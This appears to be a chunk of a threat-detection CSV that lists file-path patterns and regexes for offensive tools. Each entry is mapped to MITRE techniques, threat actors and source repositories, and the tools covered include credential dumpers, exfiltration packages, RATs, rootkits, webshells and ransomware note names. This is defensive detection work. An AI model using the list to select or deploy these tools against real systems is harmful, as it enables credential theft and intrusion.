"*\PurpleSharp.exe*",".{0,1000}\\PurpleSharp\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","17658"
"*\PurpleSharp.exe*",".{0,1000}\\PurpleSharp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","17659"
"*\PuTTY ppk Files.csv*",".{0,1000}\\PuTTY\sppk\sFiles\.csv.{0,1000}","offensive_tool_keyword","SessionGopher","uses WMI to extract saved session information for remote access tools such as WinSCP - PuTTY - SuperPuTTY - FileZilla and Microsoft Remote Desktop. It can be run remotely or locally.","T1047 - T1003.008 - T1552.004 - T1555.003","TA0006","N/A","PYSA - DarkSide - Sphinx","Credential Access","https://github.com/Arvanaghi/SessionGopher","1","0","N/A","N/A","10","10","1255","173","2022-11-22T21:33:23Z","2017-03-08T02:49:32Z","17660"
"*\PWA-Phishing*",".{0,1000}\\PWA\-Phishing.{0,1000}","offensive_tool_keyword","PWA-Phishing","Phishing with Progressive Web Apps and UI manipulation","T1071.003 - T1204.002 - T1608.003 - T1071.004","TA0006","N/A","N/A","Phishing","https://github.com/mrd0x/PWA-Phishing","1","0","N/A","N/A","10","3","288","52","2024-06-16T17:47:15Z","2024-06-09T19:47:52Z","17661"
"*\pwdump.py*",".{0,1000}\\pwdump\.py.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","17662"
"*\pwdump.py*",".{0,1000}\\pwdump\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","17663"
"*\pwdump.py*",".{0,1000}\\pwdump\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","17664"
"*\pwdump7*",".{0,1000}\\pwdump7.{0,1000}","offensive_tool_keyword","PwDump7","pwdump7 works with its own filesytem driver (from rkdetector.com technology) so users with administrative privileges are able to dump directly from disk both SYSTEM and SAM registry hives. Once dumped - the SYSKEY key will be retrieved from the SYSTEM hive and then used to decrypt both LanMan and NTLM hashes and dump them in pwdump like format.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://www.openwall.com/passwords/windows-pwdump","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","17665"
"*\pwdump7.zip*",".{0,1000}\\pwdump7\.zip.{0,1000}","offensive_tool_keyword","PwDump7","pwdump7 works with its own filesytem driver (from rkdetector.com technology) so users with administrative privileges are able to dump directly from disk both SYSTEM and SAM registry hives. Once dumped - the SYSKEY key will be retrieved from the SYSTEM hive and then used to decrypt both LanMan and NTLM hashes and dump them in pwdump like format.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://www.openwall.com/passwords/windows-pwdump","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","17666"
"*\pwdump8*",".{0,1000}\\pwdump8.{0,1000}","offensive_tool_keyword","PwDump8","pwdump7 works with its own filesytem driver (from rkdetector.com technology) so users with administrative privileges are able to dump directly from disk both SYSTEM and SAM registry hives. Once dumped - the SYSKEY key will be retrieved from the SYSTEM hive and then used to decrypt both LanMan and NTLM hashes and dump them in pwdump like format.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://download.openwall.net/pub/projects/john/contrib/pwdump/pwdump8-8.2.zip","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","17667"
"*\PWDumpX.c*",".{0,1000}\\PWDumpX\.c.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","17668"
"*\PWHashes.txt*",".{0,1000}\\PWHashes\.txt.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","17669"
"*\pwn.exe*",".{0,1000}\\pwn\.exe.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","17670"
"*\pwned.txt*",".{0,1000}\\pwned\.txt.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","N/A","10","3","298","38","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z","17671"
"*\pwnlook.exe*",".{0,1000}\\pwnlook\.exe.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","N/A","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","17672"
"*\pwnlook35.exe*",".{0,1000}\\pwnlook35\.exe.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","N/A","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","17673"
"*\pwnlook481.exe*",".{0,1000}\\pwnlook481\.exe.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","N/A","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","17674"
"*\pxlib\bin\wmiexec.x86.o*",".{0,1000}\\pxlib\\bin\\wmiexec\.x86\.o.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","17677"
"*\PyClone.py*",".{0,1000}\\PyClone\.py.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","17679"
"*\PyExfil\pyexfil\*",".{0,1000}\\PyExfil\\pyexfil\\.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","17680"
"*\Pyobfadvance*",".{0,1000}\\Pyobfadvance.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","17681"
"*\Pyobfexecute*",".{0,1000}\\Pyobfexecute.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","17682"
"*\pyobfgood*",".{0,1000}\\pyobfgood.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","17683"
"*\Pyobflite*",".{0,1000}\\Pyobflite.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","17684"
"*\Pyobfpremium*",".{0,1000}\\Pyobfpremium.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","17685"
"*\Pyobftoexe*",".{0,1000}\\Pyobftoexe.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","17686"
"*\Pyobfuse*",".{0,1000}\\Pyobfuse.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","17687"
"*\Pyobfusfile*",".{0,1000}\\Pyobfusfile.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","17688"
"*\pyramid.py*",".{0,1000}\\pyramid\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","17689"
"*\pyrdp_plugin.py*",".{0,1000}\\pyrdp_plugin\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","17690"
"*\pysecdump.exe*",".{0,1000}\\pysecdump\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17691"
"*\pysecdump-master*",".{0,1000}\\pysecdump\-master.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","0","N/A","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","17692"
"*\pysnaffler\pysnaffler\*",".{0,1000}\\pysnaffler\\pysnaffler\\.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","17694"
"*\pysoxy.py*",".{0,1000}\\pysoxy\.py.{0,1000}","offensive_tool_keyword","pysoxy","A small Socks5 Proxy Server in Python","T1090","TA0011","N/A","N/A","C2","https://github.com/MisterDaneel/pysoxy","1","0","N/A","N/A","10","10","149","51","2023-10-15T06:12:45Z","2016-04-21T07:56:24Z","17695"
"*\Python-Rootkit\*",".{0,1000}\\Python\-Rootkit\\.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","17696"
"*\pywsus.py*",".{0,1000}\\pywsus\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","17697"
"*\quantumlocker.html*",".{0,1000}\\quantumlocker\.html.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17698"
"*\QuarksADDumper.*",".{0,1000}\\QuarksADDumper\..{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","0","N/A","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","17699"
"*\QuarksPwDump*",".{0,1000}\\QuarksPwDump.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","0","N/A","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","17700"
"*\QUARKS-SAM*",".{0,1000}\\QUARKS\-SAM.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","0","#registry","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","17701"
"*\Quasar.exe*",".{0,1000}\\Quasar\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17704"
"*\Quasar.exe*",".{0,1000}\\Quasar\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17705"
"*\QueryModuleClient.exe*",".{0,1000}\\QueryModuleClient\.exe.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","17709"
"*\quickcrack.py*",".{0,1000}\\quickcrack\.py.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","0","N/A","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","17714"
"*\QuickViewAD.ps1*",".{0,1000}\\QuickViewAD\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","0","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","17715"
"*\quiet-riot-main*",".{0,1000}\\quiet\-riot\-main.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","17716"
"*\r00t-3xp10it*",".{0,1000}\\r00t\-3xp10it.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17717"
"*\R3ADM3.txt*",".{0,1000}\\R3ADM3\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17718"
"*\r57shell.php*",".{0,1000}\\r57shell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","17719"
"*\r57shell127.php*",".{0,1000}\\r57shell127\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","17720"
"*\r77config.c*",".{0,1000}\\r77config\.c.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","N/A","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","17721"
"*\r77-rootkit\*",".{0,1000}\\r77\-rootkit\\.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","N/A","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","17722"
"*\r77-x64.dll*",".{0,1000}\\r77\-x64\.dll.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","N/A","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","17723"
"*\r77-x86.dll*",".{0,1000}\\r77\-x86\.dll.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","N/A","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","17724"
"*\rabbit-hole.exe*",".{0,1000}\\rabbit\-hole\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17725"
"*\RagingRotator.go*",".{0,1000}\\RagingRotator\.go.{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090 - T1621","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","0","N/A","N/A","10","1","79","7","2024-06-06T19:31:34Z","2023-09-01T15:19:38Z","17733"
"*\ragnarlocker1.txt*",".{0,1000}\\ragnarlocker1\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17734"
"*\ragnarok.txt*",".{0,1000}\\ragnarok\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17735"
"*\RANSOM_NOTE.txt*",".{0,1000}\\RANSOM_NOTE\.txt.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","17736"
"*\ransomexx1.txt*",".{0,1000}\\ransomexx1\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17737"
"*\ransomexx2.txt*",".{0,1000}\\ransomexx2\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17738"
"*\RansomNote.txt*",".{0,1000}\\RansomNote\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17739"
